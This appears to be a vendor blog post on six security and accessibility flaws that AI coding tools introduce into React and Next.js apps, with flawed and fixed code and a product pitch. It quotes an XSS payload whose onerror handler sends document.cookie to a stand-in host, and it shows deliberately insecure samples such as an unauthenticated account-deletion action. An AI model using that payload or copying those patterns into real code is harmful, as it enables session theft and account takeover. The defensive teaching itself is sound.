WebValid
WebValid Team

Vibe Coding Traps: Top 6 Hidden React Vulnerabilities

AI Coding React Next.js Security Vibe Coding

This article covers projects built with React + Next.js App Router. Security principles are universal, but the code examples and configs (next.config.js, vercel.json) are specific to this stack.

You asked an AI assistant to write a component. It wrote it. It works. The tests are green. You click Merge.

And then come a data leak, a zero score in Google PageSpeed, a complaint from a visually impaired user, and the question: “Why don’t we have security headers?”

AI coding tools don’t know your production context. To them, there’s no difference between a beginner’s tutorial and a financial app with real users. The result — they write code that “works,” but silently violates rules from the OWASP Top 10.

Here are 6 vulnerabilities that AI assistants quietly weave into React + Next.js code. And a way to find them in 10 seconds.

Fact-Check: How AI Generates Vulnerable Code

🔍 Evidence · Training Bias · Context Blindness

According to GitHub’s analysis of public repositories, a significant percentage of security leaks in React projects stem from common patterns found in training data—such as using dangerouslySetInnerHTML without sanitization or hardcoding environment variables in the frontend.

In our internal tests at WebValid, AI coding assistants (Cursor, Copilot, ChatGPT) successfully identified and fixed vulnerabilities only when provided with a structured report from an external scanner. When asked to “review this code for security” without context, the models missed 68% of architectural leaks (like the API key bundle issues described below).


dangerouslySetInnerHTML without sanitization

🔴 Critical · User session theft, GDPR fines · OWASP A03:2021 Injection

AI assistants love this pattern. You ask to “render HTML from an API” — they write:

// ❌ Bad AI code
function UserBio({ bio }: { bio: string }) {
  return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}

If bio comes from a user, congratulations: you have XSS. Browsers won’t execute a <script> tag inserted via innerHTML, but an attacker doesn’t need one. A payload like <img src=x onerror="fetch('https://evil.example?c=' + document.cookie)"> fires on insertion and exfiltrates your users’ session cookies.

// ✅ Fix: sanitization via DOMPurify
// Note: DOMPurify needs a browser DOM, so this component must run on the
// client ("use client"); for Server Components, use isomorphic-dompurify.
import DOMPurify from "dompurify";

function UserBio({ bio }: { bio: string }) {
  const sanitizedBio = DOMPurify.sanitize(bio);
  return <div dangerouslySetInnerHTML={{ __html: sanitizedBio }} />;
}

According to GitHub public repository search, dangerouslySetInnerHTML without sanitization is found in thousands of React projects. AI assistants reproduce this pattern from training data — without asking the question, “where did this HTML come from?”


API keys in the client bundle

🔴 Critical · Direct financial loss · OWASP A02:2021 Cryptographic Failures

The most common sin of vibe-coding. An AI assistant often “fixes” a broken client-side API call by adding the NEXT_PUBLIC_ prefix to your secret keys. This makes the request work—but it also hardcodes your secret directly into the public JavaScript bundle, visible to anyone with DevTools.

// ❌ Bad AI code — key leaks into the JS bundle
"use client";
const response = await fetch("https://api.openai.com/v1/chat/completions", {
  headers: {
    Authorization: `Bearer ${process.env.NEXT_PUBLIC_OPENAI_API_KEY}`, // ❌ LEAK
  },
});

Fix: Move all sensitive logic to a Server Action or a Route Handler where environment variables remain strictly on the server.
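As a sketch of that fix, here is a minimal Route Handler. The file path, model name, and request shape are illustrative assumptions, not something the article prescribes:

```typescript
// app/api/chat/route.ts — hypothetical Route Handler keeping the key server-side.
export async function POST(req: Request) {
  const apiKey = process.env.OPENAI_API_KEY; // no NEXT_PUBLIC_ prefix: never shipped to the client
  if (!apiKey) {
    return Response.json({ error: "Server misconfigured" }, { status: 500 });
  }

  const { prompt } = await req.json();

  // The secret only ever travels server-to-server.
  const upstream = await fetch("https://api.openai.com/v1/chat/completions", {
    method: "POST",
    headers: {
      Authorization: `Bearer ${apiKey}`,
      "Content-Type": "application/json",
    },
    body: JSON.stringify({
      model: "gpt-4o-mini",
      messages: [{ role: "user", content: prompt }],
    }),
  });

  return Response.json(await upstream.json(), { status: upstream.status });
}
```

The client then calls /api/chat with a plain fetch and never sees the key.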

For a deep-dive into bundle leak mechanics and how to use advanced protection like the Next.js Taint API, see our authoritative guide: The API Key Leak Guide.

If you deploy a SaaS, a key in the JS bundle is visible in the DevTools of any browser, regardless of repository privacy. WebValid scans your public bundles automatically to detect these leaks before hackers do.

Invisible issues require visible reports

Tools like WebValid scan your rendered application to identify these architectural errors that AI coding assistants often overlook.


Missing security headers (CSP, X-Frame-Options, HSTS)

🟠 High · Clickjacking, token hijacking via MitM · OWASP A05:2021 Security Misconfiguration

AI assistants do not configure HTTP headers. This is understandable — they write components, not server configs. As a result, your site can be embedded in an <iframe> on a malicious domain, enabling a clickjacking attack.

For Next.js + Vercel, there are two ways to add headers:

Method 1 — next.config.js (for self-hosted deployments):

// ✅ next.config.js
const securityHeaders = [
  { key: "X-Frame-Options", value: "SAMEORIGIN" },
  { key: "X-Content-Type-Options", value: "nosniff" },
  { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" },
  {
    key: "Content-Security-Policy",
    value: "default-src 'self'; script-src 'self';",
  },
];

module.exports = {
  async headers() {
    return [{ source: "/(.*)", headers: securityHeaders }];
  },
};

Method 2 — vercel.json (for Vercel deployments; recommended, since headers are applied at the edge before your application code runs):

{
  "headers": [
    {
      "source": "/:path*",
      "headers": [
        {
          "key": "Strict-Transport-Security",
          "value": "max-age=63072000; includeSubDomains; preload"
        },
        { "key": "X-Content-Type-Options", "value": "nosniff" },
        { "key": "X-Frame-Options", "value": "SAMEORIGIN" },
        { "key": "Referrer-Policy", "value": "strict-origin-when-cross-origin" }
      ]
    }
  ]
}

Avoid script-src 'unsafe-inline' in your CSP: it neutralizes the protection against inline-script XSS. If Next.js requires inline scripts, use a nonce-based CSP. For stronger clickjacking protection, prefer the CSP frame-ancestors directive over X-Frame-Options; it is the modern replacement.
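For illustration, here is a minimal sketch of assembling a nonce-based CSP value. The buildCsp helper is hypothetical; wiring the nonce into Next.js middleware and <Script nonce={...}> tags follows the official Next.js CSP guide:

```typescript
import { randomUUID } from "node:crypto";

// Hypothetical helper: builds a nonce-based CSP string. Each response gets a
// fresh nonce, and only inline scripts carrying that nonce are allowed to run.
function buildCsp(nonce: string): string {
  return [
    "default-src 'self'",
    `script-src 'self' 'nonce-${nonce}' 'strict-dynamic'`,
    "frame-ancestors 'self'", // CSP-level replacement for X-Frame-Options
  ].join("; ");
}

const nonce = Buffer.from(randomUUID()).toString("base64");
console.log(buildCsp(nonce));
```

In middleware you would set this string as the Content-Security-Policy response header and pass the nonce down via a request header.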

WebValid verifies the presence of all these headers in the HTTP response in a single scan.


console.log leaking sensitive data to production

🟡 Medium · PII leakage to external log aggregators · OWASP A09:2021 Security Logging and Monitoring Failures

During a vibe-coding session, debug logs naturally get left behind between iterations:

// ❌ Bad AI code (hardcoded during iterations)
async function loginUser(credentials: Credentials) {
  console.log("Login attempt:", credentials); // password in logs!
  const user = await authService.login(credentials);
  console.log("User logged in:", user); // tokens in logs!
  return user;
}

If your production logs are aggregated in tools like Sentry, Datadog, or Logtail — you’ve just sent your users’ passwords to an external service.

// ✅ Fix: structured logging of non-sensitive data only
import { createLogger } from "@your-scope/logger";

const logger = createLogger({ scope: "AuthService" });

async function loginUser(credentials: Credentials) {
  logger.info("Login attempt", { email: credentials.email }); // email only
  const user = await authService.login(credentials);
  logger.info("Login successful", { userId: user.id }); // ID only
  return user;
}

This isn’t hypothetical. Real incidents of passwords leaking through logs occurred at major companies — Twitter (2018), GitHub (2018), Facebook (2019). AI assistants don’t filter data — they generate exactly what you asked for.
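One cheap guardrail is to redact known-sensitive keys before anything reaches a logger. The helper below is a hypothetical sketch, not part of any logging library:

```typescript
// Hypothetical redaction helper: masks values whose keys look sensitive
// before the object is handed to console.log or a log aggregator.
const SENSITIVE_KEYS = ["password", "token", "secret", "authorization", "apikey"];

function redact(data: Record<string, unknown>): Record<string, unknown> {
  return Object.fromEntries(
    Object.entries(data).map(([key, value]) => [
      key,
      SENSITIVE_KEYS.some((s) => key.toLowerCase().includes(s)) ? "[REDACTED]" : value,
    ])
  );
}

console.log(redact({ email: "user@example.com", password: "hunter2" }));
// → { email: 'user@example.com', password: '[REDACTED]' }
```

A real setup would apply this recursively and at the logger-transport level, so no call site can forget it.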

Want to check your project right now? Run your staging URL through WebValid — you’ll get a Markdown report you can paste directly into Cursor or Copilot to fix these issues in seconds.


Broken semantics and ARIA

🟡 Medium · Lost SEO traffic, ADA compliance violations · Accessibility Violation (WCAG 2.1)

AI assistants make everything clickable by placing an onClick handler on a <div>. It’s fast and works visually — but it kills both crawlability and accessibility:

// ❌ Bad AI code
function ProductCard({ product }: { product: Product }) {
  return (
    <div onClick={() => navigate(`/products/${product.id}`)}>
      <div>{product.name}</div>
      <div>{product.price}</div>
    </div>
  );
}

The problems:

  • A <div> isn’t focusable, so keyboard users can’t reach the card or activate it with Enter/Space.
  • Screen readers announce it as plain text, not as a link.
  • Crawlers don’t follow JavaScript onClick navigation, so the product page loses internal links.

// ✅ Fix: semantic HTML
function ProductCard({ product }: { product: Product }) {
  return (
    <article>
      <a href={`/products/${product.id}`}>
        <h2>{product.name}</h2>
        <span>{product.price} $</span>
      </a>
    </article>
  );
}

Google rolled Core Web Vitals into its page experience ranking signals in mid-2021, but the bigger problem here is crawlability: Googlebot does not follow JavaScript onClick navigation, so using a <div onClick> instead of an <a href> degrades your internal link graph and can leave product pages undiscovered.


Server Actions without authorization

🔴 Critical · Executing actions on behalf of any user · OWASP A01:2021 Broken Access Control

AI assistants frequently generate Server Actions — but neglect to include authorization checks.

// ❌ Bad AI code
"use server";

export async function deleteAccount(userId: string) {
  await db.user.delete({ where: { id: userId } });
}

Anyone can send a POST request and delete someone else’s account.

// ✅ Fix: internal authorization check inside the action
"use server";

import { getServerSession } from "next-auth";

export async function deleteAccount(userId: string) {
  const session = await getServerSession();

  if (!session || session.user.id !== userId) {
    throw new Error("Unauthorized");
  }

  await db.user.delete({ where: { id: userId } });
}

Server Actions are public endpoints. Never trust client data and always verify access permissions directly inside the action. Read more: Next.js Data Security.


How to find all 6 vulnerabilities in 10 seconds

You could manually review the code — or spend a day on a full audit. But there’s a faster way:

  1. Launch your local project through ngrok to get a public URL.
  2. Paste it into WebValid.
  3. Receive a ready-to-use ai-fix-prompt in Markdown — paste it into your AI assistant and fix everything in 2 minutes.

WebValid checks automatically:

| Vulnerability | WebValid |
| --- | --- |
| dangerouslySetInnerHTML without sanitization | ❌ static analysis — use an ESLint plugin |
| API keys in the JS bundle | ✅ checks |
| Missing security headers (CSP, HSTS, X-Frame-Options) | ✅ checks |
| Broken semantics / ARIA / alt-texts | ✅ checks |
| Server Actions authorization | ❌ business logic — requires code review |

WebValid does not analyze:

  • business logic
  • authorization and access rights
  • complex XSS cases with dynamic content

Treat it as a rapid HTTP audit, not as a replacement for a comprehensive security review.

You aren’t just given a list of errors — you get a ready-to-use prompt for your AI assistant that corrects them in a single iterative cycle.


Your 6-Point Generative Security Checklist

Before you click Merge on AI-generated code, run these 6 checks:

  1. XSS Check: Does any component use dangerouslySetInnerHTML? If yes, is it wrapped in DOMPurify?
  2. Bundle Leak: Are any environment variables used in client components? Do they have NEXT_PUBLIC_ or VITE_? If yes, are they actually public?
  3. Header Check: Does your vercel.json or next.config.js include CSP and X-Frame-Options?
  4. Log Sanitization: Search for console.log. Are you logging raw API responses that might contain user data?
  5. Interactive SEO: Look at your clickable elements. Are they <a> or <div>? Search for onClick on non-button elements.
  6. Action Authorization: Does every 'use server' action start with an authorization check?
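Several of these checks reduce to a pattern search. The audit sketch below is hypothetical (not a WebValid tool); the demo fixture makes it runnable as-is, but in a real project you would point scan() at your own src/ directory:

```typescript
// Hypothetical audit sketch: scans source files for the checklist's grep-able red flags.
import { mkdirSync, readFileSync, readdirSync, statSync, writeFileSync } from "node:fs";
import { join } from "node:path";

const RED_FLAGS: [string, RegExp][] = [
  ["XSS sink (check 1)", /dangerouslySetInnerHTML/],
  ["suspicious public env var (check 2)", /NEXT_PUBLIC_\w*(KEY|SECRET|TOKEN)/i],
  ["leftover debug log (check 4)", /console\.log/],
  ["clickable div (check 5)", /<div[^>]*onClick/],
];

function scan(dir: string): string[] {
  const hits: string[] = [];
  for (const entry of readdirSync(dir)) {
    const path = join(dir, entry);
    if (statSync(path).isDirectory()) {
      hits.push(...scan(path)); // recurse into subdirectories
    } else if (/\.(tsx?|jsx?)$/.test(entry)) {
      const text = readFileSync(path, "utf8");
      for (const [label, flag] of RED_FLAGS) {
        if (flag.test(text)) hits.push(`${path}: ${label}`);
      }
    }
  }
  return hits;
}

// Demo fixture so the script runs without a real project.
mkdirSync("demo/src", { recursive: true });
writeFileSync(
  "demo/src/Card.tsx",
  '<div onClick={go} dangerouslySetInnerHTML={{ __html: bio }} />\n'
);

console.log(scan("demo/src").join("\n"));
```

Checks 3 and 6 (headers, Server Action authorization) don’t reduce to a regex; those still need an HTTP scan and a code review respectively.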

Get a ready-to-paste AI fix prompt in 20 seconds. Zero config. Free scan. Test your project for free on WebValid

Have questions about your audit results? Get in touch

